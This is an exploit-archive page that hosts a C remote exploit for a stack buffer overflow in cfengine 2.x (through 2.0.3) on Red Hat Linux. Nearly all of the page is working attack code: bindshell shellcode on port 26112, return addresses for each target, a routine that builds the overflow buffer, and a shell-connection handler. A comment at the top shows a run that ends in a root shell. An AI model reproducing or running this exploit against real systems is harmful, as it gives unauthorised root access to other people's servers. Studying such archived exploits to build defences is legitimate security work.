exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

cfengine.c

cfengine.c
Posted Sep 29, 2003
Authored by jsk

Remote exploit for Cfengine versions 2.-2.0.3 that makes use of a stack overflow discussed here. Binds a shell to port 26112. Tested against RedHat.

tags | exploit, remote, overflow, shell
systems | linux, redhat
SHA-256 | 3d6399d602afc8e1234d04097ff5ebf01664d6980f11dcdde0306ddfc376b787

cfengine.c

Change Mirror Download
/*********************************************************************************\

* jsk / cfengine2-2.0.3 from redhat

* advisory: http://packetstormsecurity.nl/0309-advisories/cfengine.txt

* forking portbind shellcode 0port=26112) by netric

* bug discovered by nick cleaton, tested on redhat

* DSR-cfengine.pl :) i think it has some bugs.maybe it is only public
* version...... possbile another reasns.....
* the begin buf of exploit could be like "111111". so....DSR...
* by jsk from Ph4nt0m Security Team

* jsk@ph4nt0m.net chat with us ( irc.0x557.org #ph4nt0m)

* Greets bR-00t. eSdee.B??.lnewy.#cheese and all #ph4nt0m

* [root@localhost tmp]# ./cnex -h 127.0.0.1 -p 5803 -t 0

*

* cfengine2-2.0.3:server remote buffer overflow exploit

* by jsk.

* Greets bR-00t and all #ph4nt0m .

*[+] Hostname: 127.0.0.1
*[+] Port num: 5308
*[+] Retaddr address: 0x4029cc2c
*[1] #1 Set codes.
*[1] #1 Set socket.
*[*] attempting to connect: 127.0.0.1:5308.
*[*] successfully connected: 127.0.0.1:5308.
*[1] #1 Send codes.
*[1] #3 Get shell.
*[*] checking to see if the exploit was successful.
*[*] attempting to connect: 127.0.0.1:26112.
*[*] successfully connected: 127.0.0.1:26112.
* id
*uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6 ** (disk),10(wheel)



\*********************************************************************************/





#include <stdio.h>

#include <signal.h>

#include <unistd.h>

#include <sys/socket.h>

#include <netdb.h>

#include <netinet/in.h>

#define BUFSIZE 4136

#define D_PORT 5803

#define D_HOST "www.ph4nt0m.net"

#define TIMEOUT 10



char shell[]= /* bindshell(26112)&, netric. */

"\x90\x90\x90\x31\xdb\xf7\xe3\x53\x43\x53"
"\x6a\x02\x89\xe1\xb0\x66\x52"
"\x50\xcd\x80\x43\x66\x53\x89"
"\xe1\x6a\x10\x51\x50\x89\xe1"
"\x52\x50\xb0\x66\xcd\x80\x89"
"\xe1\xb3\x04\xb0\x66\xcd\x80"
"\x43\xb0\x66\xcd\x80\x89\xd9"
"\x93\xb0\x3f\xcd\x80\x49\x79"
"\xf9\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd"
"\x80";
struct op_plat_st

{

int op_plat_num;

char *op_plat_sys;

u_long retaddr;

int off_st;

};

struct op_plat_st __pl_form[]=

{



{0,"red 8.0",0x4029cc2c,0},

{1,"red 9.0(cmp)",0x4029cda0,0},



{2,"red 7.2 (Compile)",0x44444444,0},

{3,"red 7.3 (Compile)",0x44444444,0},

NULL

};

void banrl();

void x_fp_rm_usage(char *x_fp_rm);

unsigned short sock_connect(char *,unsigned short);

void getshell(char *,unsigned short);

void printe(char *,short);

void sig_alarm(){printe("alarm/timeout hit.",1);}

void banrl()

{

fprintf(stdout,"\n cfengine2-2.0.3:server remote buffer overflow exploit)\n");

fprintf(stdout," by jsk.\n");

fprintf(stdout," Greets Br-00t and all #ph4nt0m .\n");

}



void x_fp_rm_usage(char *x_fp_rm)

{

int __t_xmp=0;

fprintf(stdout,"\n Usage: %s -[option] [arguments]\n\n",x_fp_rm);

fprintf(stdout,"\t -h [hostname] - target host.\n");

fprintf(stdout,"\t -p [port] - port number.\n");

fprintf(stdout,"\t -s [addr] - &shellcode address.\n\n");

fprintf(stdout," Example> %s -h target_hostname -p 8000 -t num\n",x_fp_rm);

fprintf(stdout," Select target number>\n\n");

for(;;)

{

if(__pl_form[__t_xmp].op_plat_num==(0x82))

break;

else

{

fprintf(stdout,"\t {%d} %s\n",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys);

}

__t_xmp++;

}

fprintf(stdout,"\n");
exit(0);
}



int main(int argc,char *argv[])

{

int port=D_PORT;

char hostname[0x333]=D_HOST;

int whlp,type=0;

unsigned int i=0;

char *buf;

int sd;

u_long retaddr=__pl_form[type].retaddr;



(void)banrl();

while((whlp=getopt(argc,argv,"T:t:H:h:P:p:IiXx"))!=EOF)

{

extern char *optarg;

switch(whlp)

{

case 'T':

case 't':

if((type=atoi(optarg))<6)

{

retaddr=__pl_form[type].retaddr;

}

else (void)x_fp_rm_usage(argv[0]);

break;





case 'H':

case 'h':

memset((char *)hostname,0,sizeof(hostname));

strncpy(hostname,optarg,sizeof(hostname)-1);

break;



case 'P':

case 'p':

port=atoi(optarg);

break;



case 'I':

case 'i':

fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);

exit(-1);



case '?':

(void)x_fp_rm_usage(argv[0]);

break;

}

}



if(!strcmp(hostname,D_HOST))

{

(void)x_fp_rm_usage(argv[0]);

}

{

fprintf(stdout," [+] Hostname: %s\n",hostname);

fprintf(stdout," [+] Port num: %d\n",port);

fprintf(stdout," [+] Retaddr address: %p\n",retaddr);

}



fprintf(stdout," [1] #1 Set codes.\n");



if(!(buf=(char *)malloc(BUFSIZE+1)))

printe("getcode(): allocating memory failed.",1);



memset(buf, 0x90, BUFSIZE);

buf[0] = '1';
buf[1] = '1';
buf[2] = '1';
buf[3] = '1';
buf[4] = '1';
buf[5] = '1';
buf[6] = '1';

memset(buf+7,0x90,636);

memcpy(buf+7+636,shell, sizeof(shell));

memset(buf+7+636+strlen(shell),0x90,3500);

memcpy(&buf[BUFSIZE-(sizeof(retaddr))], &retaddr, sizeof(retaddr));

memcpy(&buf[BUFSIZE-(2*sizeof(retaddr))], &retaddr, sizeof(retaddr));

memcpy(&buf[BUFSIZE-(3*sizeof(retaddr))], &retaddr, sizeof(retaddr));
memcpy(&buf[BUFSIZE-(4*sizeof(retaddr))], &retaddr, sizeof(retaddr));

memcpy(&buf[BUFSIZE-(5*sizeof(retaddr))], &retaddr, sizeof(retaddr));

memcpy(&buf[BUFSIZE-(6*sizeof(retaddr))], &retaddr, sizeof(retaddr));
memcpy(&buf[BUFSIZE-(7*sizeof(retaddr))], &retaddr, sizeof(retaddr));

memcpy(&buf[BUFSIZE-(8*sizeof(retaddr))], &retaddr, sizeof(retaddr));

memcpy(&buf[BUFSIZE-(9*sizeof(retaddr))], &retaddr, sizeof(retaddr));

fprintf(stdout," [1] #1 Set socket.\n");

sd=sock_connect(hostname,port);

fprintf(stdout," [1] #1 Send codes.\n");

write(sd,buf,BUFSIZE);

close(sd);
sleep(1);
fprintf(stdout," [1] #3 Get shell.\n");
getshell(hostname,26112);
exit(0);

}

unsigned short sock_connect(char *hostname,

unsigned short port){

int sock;

struct hostent *t;

struct sockaddr_in s;

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

s.sin_family=AF_INET;

s.sin_port=htons(port);

printf("[*] attempting to connect: %s:%d.\n",hostname,port);

if((s.sin_addr.s_addr=inet_addr(hostname))){

if(!(t=gethostbyname(hostname)))

printe("couldn't resolve hostname.",1);

memcpy((char*)&s.sin_addr,(char*)t->h_addr,

sizeof(s.sin_addr));

}

signal(SIGALRM,sig_alarm);

alarm(TIMEOUT);

if(connect(sock,(struct sockaddr *)&s,sizeof(s)))

printe("netris connection failed.",1);

alarm(0);

printf("[*] successfully connected: %s:%d.\n",hostname,port);

return(sock);

}

void getshell(char *hostname,unsigned short port){

int sock,r;

fd_set fds;

char buf[4096+1];

struct hostent *he;

struct sockaddr_in sa;

printf("[*] checking to see if the exploit was successful.\n");

if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)

printe("getshell(): socket() failed.",1);

sa.sin_family=AF_INET;

if((sa.sin_addr.s_addr=inet_addr(hostname))){

if(!(he=gethostbyname(hostname)))

printe("getshell(): couldn't resolve.",1);

memcpy((char *)&sa.sin_addr,(char *)he->h_addr,

sizeof(sa.sin_addr));

}

sa.sin_port=htons(port);

signal(SIGALRM,sig_alarm);

alarm(TIMEOUT);

printf("[*] attempting to connect: %s:%d.\n",hostname,port);

if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){

printf("[!] connection failed: %s:%d.\n",hostname,port);

return;

}

alarm(0);

printf("[*] successfully connected: %s:%d.\n\n",hostname,port);

signal(SIGINT,SIG_IGN);

write(sock,"uname -a;id\n",13);

while(1){

FD_ZERO(&fds);

FD_SET(0,&fds);

FD_SET(sock,&fds);

if(select(sock+1,&fds,0,0,0)<1)

printe("getshell(): select() failed.",1);

if(FD_ISSET(0,&fds)){

if((r=read(0,buf,4096))<1)

printe("getshell(): read() failed.",1);

if(write(sock,buf,r)!=r)

printe("getshell(): write() failed.",1);

}

if(FD_ISSET(sock,&fds)){

if((r=read(sock,buf,4096))<1)

exit(0);

write(1,buf,r);

}

}

close(sock);

return;

}

void printe(char *err,short e){

fprintf(stdout," [-] Failed.\n\n");

fprintf(stdout," Happy Exploit ! :-)\n\n");



if(e)

exit(1);

return;

}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close